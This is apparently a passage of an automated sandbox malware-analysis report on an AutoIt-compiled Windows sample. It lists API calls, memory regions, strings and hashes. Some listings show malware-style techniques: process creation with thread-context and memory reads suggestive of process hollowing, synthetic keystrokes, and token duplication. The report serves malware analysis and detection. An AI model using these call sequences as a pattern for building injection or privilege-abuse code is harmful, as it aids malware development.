                                                              • Part of subcall function 004033C0: GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 00403451
                                                              • Part of subcall function 004033C0: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00403467
                                                              • Part of subcall function 004033C0: __wsplitpath.LIBCMT ref: 00403492
                                                              • Part of subcall function 004033C0: _wcscpy.LIBCMT ref: 004034A7
                                                              • Part of subcall function 004033C0: _wcscat.LIBCMT ref: 004034BC
                                                              • Part of subcall function 004033C0: SetCurrentDirectoryW.KERNEL32(?), ref: 004034CC
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: CurrentDirectory$FullNamePath__wsplitpath_free_strcat_wcscat_wcscpy
                                                            • String ID: >>>AUTOIT SCRIPT<<<
                                                            • API String ID: 3938964917-2806939583
                                                            • Opcode ID: 69d1c1bcaececaf33fe9124615222b37314c09e14b721507f7704bc6f295293c
                                                            • Instruction ID: c8289cc7cde30cfde4dff3f83c8481f20f860a5b07fa540731426c520eca24fb
                                                            • Opcode Fuzzy Hash: 69d1c1bcaececaf33fe9124615222b37314c09e14b721507f7704bc6f295293c
                                                            • Instruction Fuzzy Hash: 9A919171A00219ABCF04EFA5D8819EE7774BF48314F50452EF915B7391D778EA06CBA8
                                                            Strings
                                                            • >>>AUTOIT NO CMDEXECUTE<<<, xrefs: 0042804F
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: _strcat
                                                            • String ID: >>>AUTOIT NO CMDEXECUTE<<<
                                                            • API String ID: 1765576173-2684727018
                                                            • Opcode ID: 9cf7010eca5106026e95a37c4c4993c7a48cbbbd0f5b26026c251fe95f3d7589
                                                            • Instruction ID: e645463cc19bd0c1a49bcabea2d674544a6c2f3c5714d62cb3526a870e150300
                                                            • Opcode Fuzzy Hash: 9cf7010eca5106026e95a37c4c4993c7a48cbbbd0f5b26026c251fe95f3d7589
                                                            • Instruction Fuzzy Hash: FBF090B390020D768B00F6E6D942CEFB37C9985704B5006AFA905B3152EA79EA0987B6
                                                            APIs
                                                            • __wsplitpath.LIBCMT ref: 004678F7
                                                              • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                            • GetLastError.KERNEL32(00000000,00000000), ref: 004679C7
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast__wsplitpath_malloc
                                                            • String ID:
                                                            • API String ID: 4163294574-0
                                                            • Opcode ID: b7e2b2e067b321cb14cd8dd870a284e502ce9d37bff932640fd458450c7e1011
                                                            • Instruction ID: 5ded281afda408fdcd401bf2365ceabb828b89a129c607e264fb1023d06c7d2e
                                                            • Opcode Fuzzy Hash: b7e2b2e067b321cb14cd8dd870a284e502ce9d37bff932640fd458450c7e1011
                                                            • Instruction Fuzzy Hash: FB5126712083018BD710EF75C881A5BB3E5AF84318F044A6EF9559B381EB39ED09CB97
                                                            APIs
                                                              • Part of subcall function 0040F6F0: _wcslen.LIBCMT ref: 0040F705
                                                              • Part of subcall function 0040F6F0: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,?,00454478,?,00000000,?,?), ref: 0040F71E
                                                              • Part of subcall function 0040F6F0: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,00000000,?,?,?,?), ref: 0040F747
                                                            • _strcat.LIBCMT ref: 0040F786
                                                              • Part of subcall function 0040F850: _strlen.LIBCMT ref: 0040F858
                                                              • Part of subcall function 0040F850: _sprintf.LIBCMT ref: 0040F9AE
                                                            Similarity
                                                            • API ID: ByteCharMultiWide$_sprintf_strcat_strlen_wcslen
                                                            • String ID:
                                                            • API String ID: 3199840319-0
                                                            • Opcode ID: bd3755d61cabc1630a419da0a5008bdf21fb0fae9682b7453e2f960da4ed9882
                                                            • Instruction ID: aac9d08775c2cbfae45fd546c2dd5c585d34072f6b495fb7426f91ad36779b1c
                                                            • Opcode Fuzzy Hash: bd3755d61cabc1630a419da0a5008bdf21fb0fae9682b7453e2f960da4ed9882
                                                            • Instruction Fuzzy Hash: 7B2148B260825027D724EF3A9C82A6EF2D4AF85304F14893FF555C22C2F738D554879A
                                                            APIs
                                                            • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 0040D779
                                                            • FreeLibrary.KERNEL32(?), ref: 0040D78E
                                                            Similarity
                                                            • API ID: FreeInfoLibraryParametersSystem
                                                            • String ID:
                                                            • API String ID: 3403648963-0
                                                            • Opcode ID: 1bcd72a0122d59f5f1ef4a441970033eb21b1c6439336685a4482ae7c853bb59
                                                            • Instruction ID: 5fcdf068f8d8459ddaa7ea8882eac3df2259875866eaebb33036fc29c92b3e87
                                                            • Opcode Fuzzy Hash: 1bcd72a0122d59f5f1ef4a441970033eb21b1c6439336685a4482ae7c853bb59
                                                            • Instruction Fuzzy Hash: BB2184719083019FC300DF5ADC8190ABBE4FB84358F40493FF988A7392D735D9458B9A
                                                            APIs
                                                            • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,0040DE74,?,00000001,?,00403423,?), ref: 0040F13A
                                                            • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,0040DE74,?,00000001,?,00403423,?), ref: 00426326
                                                            Similarity
                                                            • API ID: CreateFile
                                                            • String ID:
                                                            • API String ID: 823142352-0
                                                            • Opcode ID: 01c8104855b6be3cf9f3f51c38ffad3c9237c0860841684a852cd2675ef3d23e
                                                            • Instruction ID: 8a88c5525f76e0b0fff62cf48ad84dc7055e673dbb4ccc29545257d8619b8f55
                                                            • Opcode Fuzzy Hash: 01c8104855b6be3cf9f3f51c38ffad3c9237c0860841684a852cd2675ef3d23e
                                                            • Instruction Fuzzy Hash: 16011D70784310BAF2305A68DD0BF5266546B45B24F20473ABBE5BE2D1D2F86885870C
                                                            APIs
                                                              • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                                            • __lock_file.LIBCMT ref: 00414A8D
                                                              • Part of subcall function 00415471: __lock.LIBCMT ref: 00415496
                                                            • __fclose_nolock.LIBCMT ref: 00414A98
                                                            Similarity
                                                            • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                            • String ID:
                                                            • API String ID: 2800547568-0
                                                            • Opcode ID: a5ee4eb6f63f5c531cf15d6f0d52328148e0080a1a420ce895dcb566fcff73ac
                                                            • Instruction ID: d9443fdd3ee0a3059f5d17ec53abbfe2105cc8a5d10ddad395bff0ae1f283336
                                                            • Opcode Fuzzy Hash: a5ee4eb6f63f5c531cf15d6f0d52328148e0080a1a420ce895dcb566fcff73ac
                                                            • Instruction Fuzzy Hash: EEF0F6308417019AD710AB7588027EF37A09F41379F22864FA061961D1C73C85C29B5D
                                                            APIs
                                                            • __lock_file.LIBCMT ref: 00415012
                                                            • __ftell_nolock.LIBCMT ref: 0041501F
                                                              • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                                            Similarity
                                                            • API ID: __ftell_nolock__getptd_noexit__lock_file
                                                            • String ID:
                                                            • API String ID: 2999321469-0
                                                            • Opcode ID: 5d7fd30e9bb4e6974f03027405c635b91b5e55acacb14f372dcacdb3af77c648
                                                            • Instruction ID: e3e7bc223609ce985a1750c66bb322057640979a4505571362f253753ce4bf01
                                                            • Opcode Fuzzy Hash: 5d7fd30e9bb4e6974f03027405c635b91b5e55acacb14f372dcacdb3af77c648
                                                            • Instruction Fuzzy Hash: 64F03030900605EADB107FB5DD027EE3B70AF443A8F20825BB0259A0E1DB7C8AC29A59
                                                            APIs
                                                            • CreateProcessW.KERNELBASE(?,00000000), ref: 02E71A5B
                                                            • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 02E71AF1
                                                            • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 02E71B13
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681999873.0000000002E70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E70000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_2e70000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                            • String ID:
                                                            • API String ID: 2438371351-0
                                                            • Opcode ID: 45c0bcdfd50c24934144be52d4489c8f4aeee23b26077383fd0484b0fd6f3e51
                                                            • Instruction ID: d3de9718a158fec4f2658539d32bec16ab1397486948f1af1a159dd6b3281d4c
                                                            • Opcode Fuzzy Hash: 45c0bcdfd50c24934144be52d4489c8f4aeee23b26077383fd0484b0fd6f3e51
                                                            • Instruction Fuzzy Hash: FE12BE24E14658C6EB24DF64D8507DEB232EF68300F10A4E9910DEB7A5E77A4F81CF5A
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: _memmove
                                                            • String ID:
                                                            • API String ID: 4104443479-0
                                                            • Opcode ID: 6d743864f950f4e8dd6af4daa6c332586bf39a41c922c31670318adef7ff7de3
                                                            • Instruction ID: 6397ebbfaf442e519c955e074037b65107783079284990db5ef0c3dd021860ed
                                                            • Opcode Fuzzy Hash: 6d743864f950f4e8dd6af4daa6c332586bf39a41c922c31670318adef7ff7de3
                                                            • Instruction Fuzzy Hash: 36317371E00209EBDF009F52E9866AEFBF4FF40740F2189BED855E2650E7389990D759
                                                            APIs
                                                            Similarity
                                                            • API ID: _memmove
                                                            • String ID:
                                                            • API String ID: 4104443479-0
                                                            • Opcode ID: 68aa9c4c5b5d14d70cb59537a1bb621dd1898131db9d16ab95866e5cac0f1ede
                                                            • Instruction ID: 412edbf2df7bf8c64f36b821a583ca4e96a0f18e0b9aed18a790d0e499aeb9a1
                                                            • Opcode Fuzzy Hash: 68aa9c4c5b5d14d70cb59537a1bb621dd1898131db9d16ab95866e5cac0f1ede
                                                            • Instruction Fuzzy Hash: 60319CB9600A21EFC714DF19C580A62F7E0FF08310B14C57ADA89CB795E774E892CB99
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: b88f9543b806201cae42d4d121fbe4b2eaeb6b479e9688354450343e49ff2077
                                                            • Instruction ID: 427b4a632c312742ac0951887501238d3178a51c37fde1d0fd35c98815df3d2a
                                                            • Opcode Fuzzy Hash: b88f9543b806201cae42d4d121fbe4b2eaeb6b479e9688354450343e49ff2077
                                                            • Instruction Fuzzy Hash: 21119674200201ABDB249F36D984E26B3A5AF45304B244D2FF9C5D7790DB7CE881DB5E
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 53ac66c0a220e583b8bd8a833cb4d0ab2488ecf71834bb63135a5f6edfec8b4a
                                                            • Instruction ID: fe3c5e01fee558804f1d0cd68762aa03bf47037873853bda5dcd607d85013340
                                                            • Opcode Fuzzy Hash: 53ac66c0a220e583b8bd8a833cb4d0ab2488ecf71834bb63135a5f6edfec8b4a
                                                            • Instruction Fuzzy Hash: 2D118B352046019FDB10DF69D884E96B3E9AF8A314F14856EFD298B362CB35FC41CB95
                                                            APIs
                                                            Similarity
                                                            • API ID: __lock_file
                                                            • String ID:
                                                            • API String ID: 3031932315-0
                                                            • Opcode ID: 9d46abaf5bc0bef18357e8259ddf310e5220bee08d011669e2131a09b3543261
                                                            • Instruction ID: 324047821ed349453e17c5e7f52af34d31ade4ebcb64e32b23ce3c6ad3b356a0
                                                            • Opcode Fuzzy Hash: 9d46abaf5bc0bef18357e8259ddf310e5220bee08d011669e2131a09b3543261
                                                            • Instruction Fuzzy Hash: FF011E71801219EBCF21AFA5C8028DF7B71AF44764F11851BF824551A1E7398AE2DBD9
APIs
• WriteFile.KERNELBASE(?,?,?,?,00000000,?,?,?,004263D0,?,00487ACC,00000003,0040DE90,?,?,00000001), ref: 00443E54
Memory Dump Source
• Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
Similarity
• API ID: FileWrite
• String ID:
• API String ID: 3934441357-0
• Opcode ID: 873a582ac05df194872d3361efdc1b64d97226b1633050e8059638026df5ad0f
• Instruction ID: f8d6e32d6ecef3e6c51c5ea05c7ff41eb941b2b6d152ec47b845c679c5cedb0e
• Opcode Fuzzy Hash: 873a582ac05df194872d3361efdc1b64d97226b1633050e8059638026df5ad0f
• Instruction Fuzzy Hash: 6BE01276100318ABDB10DF98D844FDA77BCEF48765F10891AFA048B200C7B4EA908BE4
APIs
Memory Dump Source
• Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
Similarity
• API ID: __wfsopen
• String ID:
• API String ID: 197181222-0
• Opcode ID: b5c1dd7f54315c70b952dff0fe33ec93e52da603c388fdf08d18a597afa050f6
• Instruction ID: b34ddb7a850719c89311ce964fc9f65e9e9400c6a390d5c1cbb008c3125e494a
• Opcode Fuzzy Hash: b5c1dd7f54315c70b952dff0fe33ec93e52da603c388fdf08d18a597afa050f6
• Instruction Fuzzy Hash: 82C092B244020C77CF112A93EC02F9A3F1E9BC0764F058021FB1C1A162AA77EAA19689
APIs
Memory Dump Source
• Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
Similarity
• API ID: AllocVirtual
• String ID:
• API String ID: 4275171209-0
• Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
• Instruction ID: 21b87f0337b3904faf2e49e7d89a80b8c5538d611ad57d97d778efbd48141229
• Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
• Instruction Fuzzy Hash: 8131F770A00105DBC718DF88E590AAAF7B1FB49310B6486A6E409CF355DB78EDC1CBD9
APIs
• CloseHandle.KERNELBASE(?,?,00426FBF), ref: 0040DA3D
Memory Dump Source
• Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
Similarity
• API ID: CloseHandle
• String ID:
• API String ID: 2962429428-0
• Opcode ID: 4893ac657bcef9b9334a0355bd28ce0f0291ef024a1c9f1561977d8c5be9d70a
• Instruction ID: 552ddd844a8bbede063c80161f66c4637379340f91e2bb70a518b226642b2913
• Opcode Fuzzy Hash: 4893ac657bcef9b9334a0355bd28ce0f0291ef024a1c9f1561977d8c5be9d70a
• Instruction Fuzzy Hash: B9E045B4A04B008BC6308F5BE444416FBF8EEE46203108E1FD4A6C2A64C3B4A1498F50
APIs
• Sleep.KERNELBASE(000001F4), ref: 02E722B1
Memory Dump Source
• Source File: 00000000.00000002.1681999873.0000000002E70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E70000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2e70000_H1CYDJ8LQe.jbxd
Similarity
• API ID: Sleep
• String ID:
• API String ID: 3472027048-0
• Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
• Instruction ID: 8d91ab66a8316bb2b6dce627c27eae9ff12b5c72864e6991b4ad18cdf0105ea2
• Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
• Instruction Fuzzy Hash: 09E0E67498010EDFDB00EFB4D54969E7FB4EF04301F104161FD05D2280D6309D508A72
APIs
• SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C8E1
• DefDlgProcW.USER32(?,0000004E,?,?), ref: 0047C8FC
• GetKeyState.USER32(00000011), ref: 0047C92D
• GetKeyState.USER32(00000009), ref: 0047C936
• SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C949
• GetKeyState.USER32(00000010), ref: 0047C953
• GetWindowLongW.USER32(00000002,000000F0), ref: 0047C967
• SendMessageW.USER32(00000002,0000110A,00000009,00000000), ref: 0047C993
• SendMessageW.USER32(00000002,0000113E,00000000,?), ref: 0047C9B6
• _wcsncpy.LIBCMT ref: 0047CA29
• SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0047CA5A
• SendMessageW.USER32 ref: 0047CA7F
• InvalidateRect.USER32(?,00000000,00000001), ref: 0047CADF
• SendMessageW.USER32(?,00001030,?,0047EA68), ref: 0047CB84
• ImageList_SetDragCursorImage.COMCTL32(00991E18,00000000,00000000,00000000), ref: 0047CB9B
• ImageList_BeginDrag.COMCTL32(00991E18,00000000,000000F8,000000F0), ref: 0047CBAC
• SetCapture.USER32(?), ref: 0047CBB6
• ClientToScreen.USER32(?,?), ref: 0047CC17
• ImageList_DragEnter.COMCTL32(00000000,?,?,?,?), ref: 0047CC26
• ReleaseCapture.USER32 ref: 0047CC3A
• GetCursorPos.USER32(?), ref: 0047CC72
• ScreenToClient.USER32(?,?), ref: 0047CC80
• SendMessageW.USER32(?,00001012,00000000,?), ref: 0047CCE6
• SendMessageW.USER32 ref: 0047CD12
• SendMessageW.USER32(?,00001111,00000000,?), ref: 0047CD53
• SendMessageW.USER32 ref: 0047CD80
• SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0047CD99
• SendMessageW.USER32(?,0000110B,00000009,?), ref: 0047CDAA
• GetCursorPos.USER32(?), ref: 0047CDC8
• ScreenToClient.USER32(?,?), ref: 0047CDD6
• GetParent.USER32(00000000), ref: 0047CDF7
• SendMessageW.USER32(?,00001012,00000000,?), ref: 0047CE60
• SendMessageW.USER32 ref: 0047CE93
• ClientToScreen.USER32(?,?), ref: 0047CEEE
• TrackPopupMenuEx.USER32(?,00000000,?,?,02E81A90,00000000,?,?,?,?), ref: 0047CF1C
• SendMessageW.USER32(?,00001111,00000000,?), ref: 0047CF46
• SendMessageW.USER32 ref: 0047CF6B
• ClientToScreen.USER32(?,?), ref: 0047CFB5
• TrackPopupMenuEx.USER32(?,00000080,?,?,02E81A90,00000000,?,?,?,?), ref: 0047CFE6
• GetWindowLongW.USER32(?,000000F0), ref: 0047D086
Strings
Memory Dump Source
• Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
Similarity
• API ID: MessageSend$ClientScreen$Image$CursorDragList_State$CaptureLongMenuPopupTrackWindow$BeginEnterInvalidateParentProcRectRelease_wcsncpy
• String ID: @GUI_DRAGID$F
• API String ID: 3100379633-4164748364
• Opcode ID: 2b9e17ba3223fb7b4804536e302a42d427f78481ee09a8534aafb1e4469c1a6d
• Instruction ID: 980357f173c9be8e312ccaa606797ee7157b6525bda81ee0817efdfc4c954517
• Opcode Fuzzy Hash: 2b9e17ba3223fb7b4804536e302a42d427f78481ee09a8534aafb1e4469c1a6d
• Instruction Fuzzy Hash: F842AD706043419FD714DF28C884FABB7A5FF89700F14865EFA489B291C7B8E846CB5A
APIs
• GetForegroundWindow.USER32 ref: 00434420
• FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00434446
• IsIconic.USER32(?), ref: 0043444F
• ShowWindow.USER32(?,00000009), ref: 0043445C
• SetForegroundWindow.USER32(?), ref: 0043446A
• GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00434481
• GetCurrentThreadId.KERNEL32 ref: 00434485
• GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00434493
• AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004344A2
• AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004344A8
• AttachThreadInput.USER32(00000000,?,00000001), ref: 004344B1
• SetForegroundWindow.USER32(00000000), ref: 004344B7
• MapVirtualKeyW.USER32(00000012,00000000), ref: 004344C6
• keybd_event.USER32(00000012,00000000), ref: 004344CF
• MapVirtualKeyW.USER32(00000012,00000000), ref: 004344DD
• keybd_event.USER32(00000012,00000000), ref: 004344E6
• MapVirtualKeyW.USER32(00000012,00000000), ref: 004344F4
• keybd_event.USER32(00000012,00000000), ref: 004344FD
• MapVirtualKeyW.USER32(00000012,00000000), ref: 0043450B
• keybd_event.USER32(00000012,00000000), ref: 00434514
• SetForegroundWindow.USER32(00000000), ref: 0043451E
• AttachThreadInput.USER32(00000000,?,00000000), ref: 0043453F
• AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434545
Strings
Memory Dump Source
• Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
Similarity
• API ID: ThreadWindow$AttachInput$ForegroundVirtualkeybd_event$Process$CurrentFindIconicShow
• String ID: Shell_TrayWnd
• API String ID: 2889586943-2988720461
• Opcode ID: 8fb90041bee2e10260771149cd23f534c9f7767a381d567acbe6a88cba9e6a8e
• Instruction ID: 0b42b206f44700a00bd4aa1610e9651ae8f7722fee000eb3c659fd44b6abead8
• Opcode Fuzzy Hash: 8fb90041bee2e10260771149cd23f534c9f7767a381d567acbe6a88cba9e6a8e
• Instruction Fuzzy Hash: AD416272640218BFE7205BA4DE4AFBE7B6CDB58B11F10442EFA01EA1D0D6F458419BA9
APIs
• DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 0044638E
• CloseHandle.KERNEL32(?), ref: 004463A0
